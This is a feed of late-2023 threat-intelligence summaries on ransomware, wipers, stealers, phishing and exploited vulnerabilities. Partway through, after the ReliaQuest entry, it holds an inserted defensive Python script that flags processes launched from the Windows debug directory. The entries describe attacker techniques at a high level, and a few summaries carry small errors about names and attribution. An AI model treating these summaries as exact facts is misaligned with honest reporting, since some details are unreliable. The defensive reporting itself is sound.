- Attack_by_Iranian_APT_using_wipers_on_Albania
- Date of Scan:
- 2024-01-05
- Impact:
- MEDIUM
- Summary:
- The Iranian psychological operation group “Homeland Justice” once more claimed to be eliminating “terrorist supporters” in a video uploaded to its Telegram channel on December 24, 2023, and shared in Albanian. This gang has been active since July 2022, concentrating on ransomware and destructive activities directed at Albania. The next day, the actor declared on its official website and Telegram channel that the computer systems and webpages of several Albanian infrastructure and government agencies had been totally compromised and wiped.
Source:
https://www.clearskysec.com/wp-content/uploads/2024/01/No-Justice-Wiper.pdf
—
- Intel Source:
- Fortinet
- Intel Name:
- Cryptomining_PyPI_Packages_Targeting_Linux
- Date of Scan:
- 2024-01-04
- Impact:
- LOW
- Summary:
- Researchers from FortiGuard Labs have noted that three new malicious packages with the ability to install a cryptocurrency miner on vulnerable Linux computers have been found in the Python Package Index (PyPI) open-source repository.
—
- Intel Source:
- Uptycs
- Intel Name:
- UAC_0050_Targeting_Ukraine_With_Remcos_RAT_Pipe_Method
- Date of Scan:
- 2024-01-04
- Impact:
- LOW
- Summary:
- The UAC-0050 threat group, well-known for its history of unrelenting cyberattacks against targets in Ukraine, is back at it. However, this time, researchers at Uptycs have uncovered a sophisticated tactic that permits a more covert data transfer channel, successfully eluding antivirus and Endpoint Detection and Response (EDR) detection methods.
Source:
https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_summarized_malware_families_roundups
- Date of Scan:
- 2024-01-03
- Impact:
- MEDIUM
- Summary:
- This article summarizes the malware families (and groups pushing malware) seen by Unit 42. This article reviews all our timely threat intelligence released from October through December 2023.
Source:
https://unit42.paloaltonetworks.com/unit42-threat-intelligence-roundup/
—
- Intel Source:
- Resecurity
- Intel Name:
- The_implementation_of_Artificial_Intelligence_for_invoice_fraud
- Date of Scan:
- 2024-01-03
- Impact:
- LOW
- Summary:
- Resecurity discovered a threat actor group, “GXC Team”, which is known for crafting tools for online banking theft, e-commerce deception, and internet scams. This time the group introduced a new tool that incorporates Artificial Intelligence into the creation of fraudulent invoices used for wire fraud and Business E-Mail Compromise (BEC). According to an FBI IC3 report, successful business email compromise (BEC) scams (such as invoice fraud) resulted in an average loss of over $120,000 per incident, inflicting a staggering financial toll of more than $2.4 billion on organizations.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malicious_malspam_attachments
- Date of Scan:
- 2024-01-03
- Impact:
- LOW
- Summary:
- John Kopriva from ISC.SANS shared his observations from the last 12 months: 1152 potentially malicious attachments of different types were caught by his malspam trap. After decompressing and/or unpacking all the images and archives, removing all duplicates, and eliminating all the non-malicious files, he was still left with 525 unique malicious samples – 285 of these were PE files with various extensions, and the rest were a wide assortment of scripts, Office files, PDFs, help files, shortcut links, etc.
—
- Intel Source:
- Fortinet
- Intel Name:
- 8base_Ransomware_Roundup
- Date of Scan:
- 2024-01-03
- Impact:
- MEDIUM
- Summary:
- The Ransomware Roundup report aims to provide readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants. 8base is a financially motivated ransomware variant most likely based on the Phobos ransomware. Per our FortiRecon information, the 8base ransomware first appeared in May 2023.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-8base
—
- Intel Source:
- Antiy
- Intel Name:
- Analysis_of_the_Ransomware_Attack_On_Boeing
- Date of Scan:
- 2024-01-03
- Impact:
- MEDIUM
- Summary:
- Antiy CERT reviewed recent major attack cases, selected the extortion attack on the Boeing Company that was linked to the LockBit group, and conducted a full analysis. Antiy CERT has been monitoring such attacks for a long time and has continued to pay attention to attack organizations such as LockBit, forming a relatively systematic body of analysis. The analysis draws on intelligence data from the Antiy Cyber Ultrain platform and on public information about this incident released by CISA and other agencies.
Source:
https://www.antiy.cn/research/notice&report/research_report/BoeingReport.html
—
- Intel Source:
- Cyber Security news
- Intel Name:
- The_use_of_weaponized_LNK_files_to_exploit_vulnerabilities_in_Windows
- Date of Scan:
- 2024-01-02
- Impact:
- MEDIUM
- Summary:
- Last month, cybersecurity researchers at ASEC identified that the Kimsuky group has been actively using the weaponized LNK file to deploy AppleSeed malware. Hackers use weaponized LNK files to exploit vulnerabilities in Windows operating systems. These files often contain malicious code that can be executed when the user clicks on the shortcut.
Source:
https://cybersecuritynews.com/kimsuky-appleseed-malware/
—
- Intel Source:
- Resecurity
- Intel Name:
- New_Version_Of_Medusa_Stealer_Released
- Date of Scan:
- 2024-01-02
- Impact:
- LOW
- Summary:
- Resecurity researchers observed last week the details of the new Medusa Stealer malware. The released version of Meduza is 2.2, a significantly upgraded password stealer poised to wreak havoc on unsuspecting victims. The stealer’s new capabilities include support for more software clients (including browser-based cryptocurrency wallets), an upgraded credit card (CC) grabber, and additional advanced mechanisms for dumping password storage on various platforms to extract credentials and tokens.
Source:
https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web
—
- Intel Source:
- SOC Radar
- Intel Name:
- Diving_Deep_into_Cactus_Ransomware
- Date of Scan:
- 2024-01-02
- Impact:
- LOW
- Summary:
- Since its discovery in March 2023, the Cactus Ransomware Group has quickly expanded throughout the digital sphere, exploiting flaws in VPNs in particular to obtain unauthorized access and establish a presence on compromised systems. The group has demonstrated a deep understanding of evasion strategies, using a dynamic approach to encryption and a variety of tools and procedures to ensure the efficient and discreet delivery of its malicious payload.
Source:
https://socradar.io/dark-web-profile-cactus-ransomware/
—
- Intel Source:
- Microsoft
- Intel Name:
- Microsoft_Stops_MSIX_Protocol_Handler_Used_Maliciously
- Date of Scan:
- 2023-12-29
- Impact:
- MEDIUM
- Summary:
- After several financially motivated threat groups used the MSIX ms-appinstaller protocol handler to infect Windows users with malware, Microsoft disabled it once more. In order to get around security measures that would normally shield Windows users from malware, such as the Defender SmartScreen anti-phishing and anti-malware component and built-in browser alerts warning users against downloading executable files, the attackers took advantage of the CVE-2021-43890 Windows AppX Installer spoofing vulnerability.
—
- Intel Source:
- SANS
- Intel Name:
- A_Glimpse_into_DShield_Honeypot_Activity
- Date of Scan:
- 2023-12-28
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have discovered a disruptive malware strain called Mirai, which has caused havoc since it was discovered. It takes advantage of security flaws in IoT devices and turns them into a “botnet,” or network of bots, that can be used to launch massive network attacks.
—
- Intel Source:
- CERT UA
- Intel Name:
- A_Domain_Controller_is_Threatened_Within_an_Hour_of_Attack
- Date of Scan:
- 2023-12-28
- Impact:
- MEDIUM
- Summary:
- Following an investigation by CERT-UA researchers into an incident, it was discovered that the aforementioned links take the victim to a webpage where, using JavaScript and features of the application protocol “search” (“ms-search”), a shortcut file is downloaded. When opened, it launches a PowerShell script created to open a decoy document and to download, from a remote (SMB) resource, the Python interpreter together with the Client.py file tracked as MASEPIE.
—
- Intel Source:
- ASEC
- Intel Name:
- Trend_Analysis_of_Kimsuky_Group_Attacks
- Date of Scan:
- 2023-12-28
- Impact:
- LOW
- Summary:
- Spear phishing attacks are a regular tactic used by the Kimsuky threat group to target South Korean users. Typically, the organization sends out malicious files that appear to be document attachments for emails. Users may not be able to operate their machine when they launch these attachments.
—
- Intel Source:
- Barracuda
- Intel Name:
- New_Zero_Day_in_Barracuda_s_ESG_Appliances
- Date of Scan:
- 2023-12-28
- Impact:
- LOW
- Summary:
- Barracuda posted that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy backdoors on a “limited number” of devices. Assigned CVE-2023-7102, the issue is an arbitrary code execution flaw in a third-party, open-source library named Spreadsheet::ParseExcel, which is used by the Amavis scanner within the gateway to screen Microsoft Excel email attachments for malware.
Source:
https://www.barracuda.com/company/legal/esg-vulnerability
https://thehackernews.com/2023/12/chinese-hackers-exploited-new-zero-day.html
—
- Intel Source:
- Cyble
- Intel Name:
- QBit_Stealer_s_source_code_malicious_feature
- Date of Scan:
- 2023-12-28
- Impact:
- LOW
- Summary:
- After analyzing qBit Stealer’s source code, the Cyble research team discovered a feature unlike that of other stealers: qBit selectively targets files with specific extensions. This characteristic implies its potential use as an exfiltration tool in ransomware operations.
Source:
https://cyble.com/blog/decoding-qbit-stealers-source-release-and-data-exfiltration-prowess/
—
- Intel Source:
- Barracuda
- Intel Name:
- Vulnerability_in_Barracuda_Email_Security_Gateway_Appliance
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- According to the findings of Barracuda experts’ ongoing investigation, a threat actor deployed a specially designed Excel email attachment to target a certain number of ESG devices by exploiting an Arbitrary Code Execution (ACE) vulnerability within a third-party library, Spreadsheet::ParseExcel.
Source:
https://www.barracuda.com/company/legal/esg-vulnerability
—
- Intel Source:
- Esentire
- Intel Name:
- Ande_Loader_and_SwaetRAT_analysis
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- This article analyzes the malicious payloads used by the PhantomControl threat actors. It explains the process of retrieving the base64-encoded data from the downloaded image, the parameters passed to the “VAI” method, and the core payload, SwaetRAT, which is written in .NET and has keylogging capabilities. It also explains the ID generation algorithm, the commands handled by the ReadPacket class, and the creation of persistence via startup folders and process hollowing techniques. Finally, it provides a Yara rule for SwaetRAT and recommendations for protection.
Source:
https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat
—
- Intel Source:
- Security Intelligence
- Intel Name:
- Advanced_Web_Injection_Campaignu_unraveling_the_Tactics_of_a_Sophisticated_Threat
- Date of Scan:
- 2023-12-27
- Impact:
- MEDIUM
- Summary:
- In a recent analysis, IBM Security Trusteer has uncovered a sophisticated web injection campaign that utilizes JavaScript injections, impacting over 40 banks across North America, South America, Europe, and Japan. This malware, possibly linked to DanaBot, employs evasive techniques, including dynamic web injection, to compromise popular banking applications. The injected JavaScript targets specific pages within banks, aiming to intercept user credentials and potentially monetize banking information. The attackers purchased malicious domains in December 2022, initiating campaigns since early 2023. The web injection’s dynamic behavior, communication with a command and control server, and adaptability make it a significant threat to the security of financial institutions and their customers. Users are advised to remain vigilant, report suspicious activities, and follow best practices for security.
Source:
https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Threat_Actor_UAC_0099_continues_to_target_Ukraine
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- Threat actor ‘UAC-0099’ has been targeting Ukraine since mid-2022, using a fabricated court summons to bait targets, a RAR SFX with LNK infection vector, and an HTA infection vector. They have also exploited a WinRAR vulnerability, CVE-2023-38831. To reduce risk, monitoring and limiting PowerShell and scheduled tasks is recommended, as well as updating WinRAR. IOCs and a POC for CVE-2023-38831 can be found on GitHub.
Source:
https://www.deepinstinct.com/blog/threat-actor-uac-0099-continues-to-target-ukraine
—
- Intel Source:
- thehackernews
- Intel Name:
- PikaBot_Malware_Spreads_via_Malvertising_Campaign_Targeting_AnyDesk_Users
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- Security researchers have uncovered a malvertising campaign spreading the PikaBot malware, particularly targeting users searching for legitimate software like AnyDesk. PikaBot, previously distributed through malspam campaigns, serves as a loader and backdoor, allowing unauthorized remote access to compromised systems. In this campaign, threat actors, including the notorious TA577, leverage malicious Google ads for AnyDesk that redirect victims to a fake website hosting a malicious MSI installer on Dropbox. The malvertising tactic involves bypassing Google’s security checks with a tracking URL via a legitimate marketing platform. The attack is reminiscent of malvertising chains previously observed with other loader malware, indicating a potential trend in “malvertising-as-a-service.” This discovery follows a surge in malicious ads through Google searches for popular software, indicating a growing threat in browser-based attacks.
Source:
https://thehackernews.com/2023/12/new-malvertising-campaign-distributing.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_spike_of_phishing_attacks_with_Crypto_drainers
- Date of Scan:
- 2023-12-27
- Impact:
- LOW
- Summary:
- This article examines the threat of phishing attacks with crypto drainers, which involve malicious smart contracts and deceptive websites to deceive users into giving away their tokens. It explains the Angel Drainer technique, a phishing attack that uses permit functions to transfer tokens without the user’s knowledge. Tips are provided on how to safeguard against these attacks.
Source:
https://research.checkpoint.com/2023/the-rising-threat-of-phishing-attacks-with-crypto-drainers/
—
- Intel Source:
- Fortinet
- Intel Name:
- Bandook_malware_behavior
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- FortiGuard Labs has discovered a new variant of the Bandook malware, a persistent remote access trojan (RAT) with origins dating back to 2007. This latest variant is distributed through a PDF file containing a shortened URL, leading to a password-protected .7z file. Upon extraction, the malware injects its payload into the msinfo32.exe process. The malware exhibits a refined injection process and establishes persistence through registry manipulation. The communication with its command and control (C2) server involves an array of commands, including file manipulation, information stealing, and control over the victim’s computer. FortiGuard Labs provides insights into the malware’s behavior and the added complexity in its latest variant, offering protections against the identified threats.
Source:
https://www.fortinet.com/blog/threat-research/bandook-persistent-threat-that-keeps-evolving
—
- Intel Source:
- Imperva
- Intel Name:
- 8220_Gang_Evolving_Tactics_Exploiting_Web_Servers
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- Imperva Threat Research uncovers new activity from the 8220 gang, a Chinese-origin threat group known for deploying cryptojacking malware on both Windows and Linux web servers. The blog details recent exploits, attack vectors, and indicators of compromise (IoCs), emphasizing the importance of patching and robust security measures for organizations. The group’s evolving tactics include exploiting vulnerabilities such as CVE-2021-44228, CVE-2017-3506, and CVE-2020-14883 to propagate malware, with Imperva providing mitigation through its Cloud WAF and on-prem WAF.
Source:
https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/
—
- Intel Source:
- Seqrite
- Intel Name:
- A_Sophisticated_Phishing_Campaign_Targeting_Indian_Government_Personnel
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- Operation RusticWeb is an advanced phishing campaign, active since October 2023, that specifically targets Indian government personnel, notably in the defense sector. The threat actors employ Rust-based payloads and encrypted PowerShell scripts for file system enumeration and exfiltration of confidential documents. Noteworthy tactics include the use of fake domains mimicking government entities, such as the Army Welfare Education Society (AWES) and the Department of Personnel & Training. The campaign, exhibiting similarities with known APT groups linked to Pakistan, reflects a shift towards newer programming languages like Rust.
—
- Intel Source:
- ASEC
- Intel Name:
- Analysis_of_SSH_Scanner_Malware_Attacks_on_Linux_Servers
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency Response Center (ASEC) has conducted a detailed analysis of recent attack campaigns targeting poorly managed Linux SSH servers. In addition to commonly installed malware like DDoS bots and CoinMiners, threat actors are employing SSH scanner malware to extract valuable information, including IP addresses and SSH account credentials. This article outlines the attack flow, including the utilization of tools such as ShellBot, Tsunami, ChinaZ DDoS Bot, and XMRig CoinMiner.
—
- Intel Source:
- Sucuri
- Intel Name:
- MageCart_WordPress_Plugin_Injects_Malicious_stuff
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- A new strain of MageCart malware has been identified, targeting WordPress/WooCommerce e-commerce websites. The malware injects itself into the mu-plugins directory, concealing its presence and making removal challenging. Operating under the guise of a fake WordPress Cache Addons plugin, the malware goes to great lengths to avoid detection and removal, even restricting the use of file manager plugins. Notably, it creates a hidden administrator user account, providing attackers sustained access. The malware’s primary goal is credit card skimming, injecting sophisticated JavaScript into the website’s checkout page.
—
- Intel Source:
- Infoblox
- Intel Name:
- A_Comprehensive_Analysis_of_Phishing_Infrastructure_and_Tactics
- Date of Scan:
- 2023-12-26
- Impact:
- LOW
- Summary:
- The United States Postal Service (USPS) has become a prime target for a surge in SMS phishing attacks, colloquially known as smishing, since July. Chinese threat actors dominate this trend, utilizing a dark market toolkit to facilitate attacks on various messaging platforms and carriers. The toolkit’s ease of use and affordability have contributed to a notable increase in USPS-themed phishing campaigns. While previous reports have focused on specific campaigns, actors, or the toolkit itself, this analysis delves into a comprehensive examination of over 7,000 USPS-related domains, revealing distinct techniques, tactics, and procedures (TTPs) observable in the Domain Name System (DNS).
—
- Intel Source:
- Sophos
- Intel Name:
- Akira_ransomware_came_back
- Date of Scan:
- 2023-12-24
- Impact:
- MEDIUM
- Summary:
- There was an observation of some incidents involving Akira ransomware which has a big impact on different areas and countries. According to the evidence, Akira has primarily targeted organizations in Europe, North America, and Australia, and operates in the government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunication sectors.
Source:
https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/
—
- Intel Source:
- CERT-UA
- Intel Name:
- New_UAC_0050_attack_using_RemcosRAT
- Date of Scan:
- 2023-12-23
- Impact:
- MEDIUM
- Summary:
- Recently, the CERT-UA has observed the mass distribution of e-mails with the subject “Debts under the Kyivstar contract” and an attachment in the form of the “Subscriber debt.zip” archive.
—
- Intel Source:
- Trustwave
- Intel Name:
- HR_Themed_Spam_Emails
- Date of Scan:
- 2023-12-21
- Impact:
- LOW
- Summary:
- Trustwave provided their details on some recent campaigns that use HR-related themes, along with their context and a run-through of their attack flow.
—
- Intel Source:
- Netskope
- Intel Name:
- The_Nim_based_Campaign_Using_Microsoft_Word_Docs
- Date of Scan:
- 2023-12-21
- Impact:
- LOW
- Summary:
- Netskope did some analysis of a malicious backdoor written in Nim, which is a relatively new programming language. Their blog gives detailed analyses of a recent targeted threat that uses Word document bait to deliver a Nim backdoor.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Some_malware_clusters_spreads_via_email_and_fake_browser_updates
- Date of Scan:
- 2023-12-21
- Impact:
- LOW
- Summary:
- Proofpoint observed the DarkGate remote access Trojan (RAT) being used by multiple cybercrime actors and spread through many methods, including email, Microsoft Teams, Skype, malvertising, and fake browser updates. The researchers also provided details on the RogueRaticate and BattleRoyal fake-update activity clusters.
—
- Intel Source:
- Intezer
- Intel Name:
- Operation_HamsaUpdate
- Date of Scan:
- 2023-12-21
- Impact:
- HIGH
- Summary:
- The Israel National Cyber Directorate issued a warning about a phishing campaign actively targeting Israeli customers of F5 network devices, which it named Operation HamsaUpdate. The campaign deploys a newly developed wiper malware that targets both Windows and Linux servers.
Source:
https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/
—
- Intel Source:
- Security Intelligence
- Intel Name:
- Web_injections_are_on_the_rise
- Date of Scan:
- 2023-12-21
- Impact:
- LOW
- Summary:
- Security Intelligence researchers performed a deep analysis of the web injection used in the recent campaign: its evasion techniques, code flow, targets, and the methods employed to reach them. Analysts found that in this new campaign the threat actors’ intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept users’ credentials in order to access and likely monetize their banking information.
Source:
https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/
—
- Intel Source:
- Trustwave
- Intel Name:
- Instagram_Phishing_attacks
- Date of Scan:
- 2023-12-20
- Impact:
- LOW
- Summary:
- Trustwave researchers observed another campaign of Instagram “Copyright Infringement” phishing emails in their spam traps. In this new campaign the threat actors additionally attempt to obtain the victim’s Instagram backup codes. The campaign is an enhanced version of the one Trustwave described in the SpiderLabs blog post titled “Insta-Phish-A-Gram”.
—
- Intel Source:
- Zscaler
- Intel Name:
- Agent_Tesla_delivery
- Date of Scan:
- 2023-12-20
- Impact:
- LOW
- Summary:
- Zscaler analyzed new tactics threat actors employ to deploy Agent Tesla malware by exploiting CVE-2017-11882, the Microsoft Office Equation Editor memory corruption vulnerability. Agent Tesla is an advanced keylogger with features such as clipboard logging, keystroke logging, screen capturing, and extraction of stored passwords from web browsers.
—
- Intel Source:
- Symantec
- Intel Name:
- Seedworm_Iranian_Hackers_Target_Telecoms
- Date of Scan:
- 2023-12-20
- Impact:
- MEDIUM
- Summary:
- The Iranian espionage group Seedworm (aka MuddyWater) attacked telecom companies in Egypt, Sudan, and Tanzania. The group has been active since 2017, has attacked organizations in many countries, and is believed to be part of Iran’s Ministry of Intelligence and Security. The threat actors used a variety of tools in this activity: researchers on Symantec’s Threat Hunter Team, part of Broadcom, found a MuddyC2Go PowerShell launcher, and the attackers also used the SimpleHelp remote access tool and Venom Proxy, both previously associated with Seedworm activity, as well as a custom keylogging tool and other publicly available and living-off-the-land tools.
—
- Intel Source:
- AT&T
- Intel Name:
- JaskaGO_malware_attacks_on_macOS_and_Windows
- Date of Scan:
- 2023-12-20
- Impact:
- MEDIUM
- Summary:
- AT&T Alien Labs discovered a sophisticated malware stealer strain written in the Go programming language that poses a severe threat to both Windows and macOS systems.
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Two_novel_techniques_deployed_on_GitHub
- Date of Scan:
- 2023-12-20
- Impact:
- MEDIUM
- Summary:
- ReversingLabs researchers have uncovered two novel techniques running on GitHub — one abusing GitHub Gists, another issuing commands through git commit messages.
Source:
https://www.reversinglabs.com/blog/malware-leveraging-public-infrastructure-like-github-on-the-rise
—
- Intel Source:
- ReliaQuest
- Intel Name:
- Double_Extortion_Attack_Analysis
- Date of Scan:
- 2023-12-20
- Impact:
- LOW
- Summary:
- A couple of months ago, ReliaQuest detected unknown process executions inside a customer’s environment, originating from the Windows debug directory. The analysts’ investigation showed that these executions were part of a larger cyber-threat incident that resulted in double extortion: the exfiltration of customer data, followed by ransomware deployment (encryption) and a threat to release the data publicly.
Source:
https://www.reliaquest.com/blog/double-extortion-attack-analysis/
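The unusual launch location noted above (executables running out of the Windows debug directory) is a cheap, high-signal hunting check. The script below is an added example, not code from the ReliaQuest report: it parses constructed Sysmon-style process-creation records (Event ID 1; the key=value line format and sample values are constructed for illustration) and flags any image whose normalised directory sits under C:\Windows\debug, handling case differences, forward slashes and `..` traversal so that a similarly named sibling directory such as C:\Windows\debugger does not trigger a false positive.

```python
"""Flag process executions launched from the Windows debug directory.

Added example, not from the ReliaQuest report. Input lines are constructed
Sysmon-style process-creation records (EventID 1) in a simple key=value
format; the line format and sample values are assumptions for illustration.
"""
import ntpath
import re
from dataclasses import dataclass

# Directory that legitimately holds almost no executables; execution from it
# (or any subdirectory) is a strong anomaly. Compared after normalisation.
SUSPICIOUS_DIR = r"c:\windows\debug"

# key=value pairs, with optional double-quoted values (paths contain spaces)
_FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')


@dataclass(frozen=True)
class Finding:
    timestamp: str
    image: str
    parent: str
    user: str
    reason: str


def parse_record(line):
    """Split one constructed key=value log line into a dict."""
    fields = {}
    for m in _FIELD_RE.finditer(line):
        key = m.group(1)
        value = m.group(3) if m.group(3) is not None else m.group(4)
        fields[key] = value
    return fields


def normalise(path):
    """Lower-case, convert '/' to '\\', strip quotes and resolve '..'.

    ntpath is pure Python, so this works on a Linux analysis host too.
    """
    return ntpath.normpath(path.strip('"').replace("/", "\\")).lower()


def is_in_debug_dir(image):
    """True if the image's directory is C:\\Windows\\debug or below it."""
    directory = ntpath.dirname(normalise(image))
    # exact match or a real subdirectory; the trailing separator prevents
    # C:\Windows\debugger from matching as a prefix
    return directory == SUSPICIOUS_DIR or directory.startswith(SUSPICIOUS_DIR + "\\")


def detect(lines):
    """Return a Finding for every process-creation record in a suspicious dir."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec.get("EventID") != "1":        # only process creation events
            continue
        image = rec.get("Image", "")
        if is_in_debug_dir(image):
            findings.append(Finding(
                timestamp=rec.get("UtcTime", "?"),
                image=image,
                parent=rec.get("ParentImage", "?"),
                user=rec.get("User", "?"),
                reason="process executed from Windows debug directory",
            ))
    return findings


# Constructed sample log: one benign service, two executions from the debug
# directory (one written with forward slashes and '..'), one network event
# that must be ignored, and one near-miss from C:\Windows\debugger.
SAMPLE_LOG = [
    r'UtcTime=2023-10-02T08:14:03 EventID=1 Image="C:\Windows\System32\svchost.exe" ParentImage="C:\Windows\System32\services.exe" User="NT AUTHORITY\SYSTEM"',
    r'UtcTime=2023-10-02T08:15:11 EventID=1 Image="C:\Windows\debug\ms.exe" ParentImage="C:\Windows\System32\cmd.exe" User="CORP\svc_backup"',
    r'UtcTime=2023-10-02T08:15:12 EventID=3 Image="C:\Windows\debug\ms.exe" DestinationIp=203.0.113.10',
    r'UtcTime=2023-10-02T08:16:40 EventID=1 Image="c:/windows/DEBUG/../debug/rc.exe" ParentImage="C:\Windows\debug\ms.exe" User="CORP\svc_backup"',
    r'UtcTime=2023-10-02T08:17:02 EventID=1 Image="C:\Windows\debugger\ntsd.exe" ParentImage="C:\Windows\explorer.exe" User="CORP\alice"',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f.timestamp} {f.user} {f.parent} -> {f.image}: {f.reason}")
```

Run as-is it reports the two debug-directory executions and nothing else. In production the same check is usually expressed as a SIEM query on the process-creation table; the normalisation step matters there too, because attackers and tooling routinely vary path case and separators.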
—
- Intel Source:
- PaloAlto
- Intel Name:
- Malicious_JavaScript_samples_to_steal_sensitive_information
- Date of Scan:
- 2023-12-20
- Impact:
- LOW
- Summary:
- Unit 42 researchers have observed threat actors using malicious JavaScript samples to steal sensitive information by abusing popular survey sites, low-quality hosting, and web chat APIs. In some campaigns, attackers created chatbots that they registered to someone noteworthy such as an Australian footballer. Other malware campaigns had both web skimmers injected into compromised sites and traditional phishing sites.
Source:
https://unit42.paloaltonetworks.com/malicious-javascript-steals-sensitive-data/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Modus_operandi_UAC_0177_JokerDPR_attack
- Date of Scan:
- 2023-12-20
- Impact:
- MEDIUM
- Summary:
- CERT-UA investigated an incident that had been reported, in a manipulative form, on the Telegram channel JokerDPR. It found that one of the methods used by JokerDPR’s “followers”, or whose results are published on that channel, is phishing aimed at gaining unauthorized access to accounts on the Google, Ukr.Net, and Outlook mail services, as well as on the EXMO and Binance cryptocurrency exchanges.
—
- Intel Source:
- Cyberint
- Intel Name:
- Anonymous_Sudan_expansion
- Date of Scan:
- 2023-12-19
- Impact:
- LOW
- Summary:
- In December 2023 Cyberint detected that Anonymous Sudan claimed responsibility for disrupting the Discord login page in collaboration with SKYNET and GodzillaBotnet. This action stands among a series of recent collaborative attacks the groups executed.
Source:
https://cyberint.com/blog/research/anonymous-sudan-an-analysis/
—
- Intel Source:
- CISA
- Intel Name:
- The_Play_ransomware_group
- Date of Scan:
- 2023-12-19
- Impact:
- MEDIUM
- Summary:
- The FBI, CISA, and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) released a joint Cybersecurity Advisory (CSA), #StopRansomware: Play Ransomware, to disseminate Play ransomware group’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data, and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia.
—
- Intel Source:
- Any.Run
- Intel Name:
- Malware_Trends_Tracker
- Date of Scan:
- 2023-12-19
- Impact:
- LOW
- Summary:
- Every day, users upload a large number of submissions to the ANY.RUN sandbox, many of which receive malicious verdicts. That is why the researchers created the Malware Trends Tracker. Each malware entry provides its history, recent samples, distribution methods, an execution video, the detection process, global, weekly, and monthly ranks, and IOCs: the latest IP addresses, hashes, domain names, and URLs.
Source:
https://any.run/cybersecurity-blog/malware-statistics-and-trends/
—
- Intel Source:
- Trellix
- Intel Name:
- Cybercriminals_abuse_GitHub_tool_Predator
- Date of Scan:
- 2023-12-19
- Impact:
- LOW
- Summary:
- Trellix showed in their blog how cybercriminals have abused the GitHub tool Predator, using it in multiple phishing campaigns with frequently changing URL patterns over a very short span. Predator, a tool designed to combat bots and web crawlers, can distinguish web requests originating from automated systems, bots, or web crawlers, which the phishing operators use to hide their pages from scanners.
—
- Intel Source:
- ASEC
- Intel Name:
- Ongoing_Exploitation_of_Apache_ActiveMQ_Vulnerability
- Date of Scan:
- 2023-12-19
- Impact:
- MEDIUM
- Summary:
- A recent blog post by AhnLab Security Emergency Response Center (ASEC) reveals that threat actors continue to exploit the Apache ActiveMQ vulnerability CVE-2023-46604, a remote code execution flaw in the message broker, to deploy Ladon, NetCat, AnyDesk, and z0Miner.
—
- Intel Source:
- SANS
- Intel Name:
- Unearthing_a_Scripted_Assault_on_RocketMQ
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- Delving into the aftermath of the CVE-2023-33246 vulnerability in RocketMQ, this report spotlights a malicious Bash script discovered in the wild. Operating surreptitiously, the script dynamically sets up an environment, installs dependencies, and uses the masscan port scanner to identify vulnerable servers. Targeting the open ports associated with RocketMQ, the script then hands over to a Python component for the actual exploitation.
—
- Intel Source:
- Rewterz
- Intel Name:
- Kimsuky_threat_group_is_targeting_research_institutes_in_South_Korea
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- The North Korean state-backed threat group known as Kimsuky is targeting research institutes in South Korea with spear-phishing to infect the target systems with backdoor trojans and ultimately execute commands for stealing sensitive data.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Early_Detection_of_Malicious_Stockpiled_Domains
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- Palo Alto Unit 42 analysts described how cybercriminals stockpile domains in bulk ahead of campaigns, and techniques for detecting such stockpiled domains early, before they are put to malicious use.
Source:
https://unit42.paloaltonetworks.com/detecting-malicious-stockpiled-domains/
—
- Intel Source:
- Nsfocus
- Intel Name:
- Xorbot_Botnet_Family
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
- NSFOCUS’s Global Threat Hunting system observed an ELF file being widely spread and generating a large amount of suspected encrypted outbound traffic that the detection engine did not flag. Further analysis identified it as a novel, deeply hidden botnet family. Because the family uses multiple rounds of XOR operations in its encryption and decryption routines, NSFOCUS Research Labs named the Trojan xorbot.
Source:
https://nsfocusglobal.com/xorbot-a-stealthy-botnet-family-that-defies-detection/
—
- Intel Source:
- Cyfirma
- Intel Name:
- The_Sidewinder_group_cyber_intrusion_tactics
- Date of Scan:
- 2023-12-18
- Impact:
- LOW
- Summary:
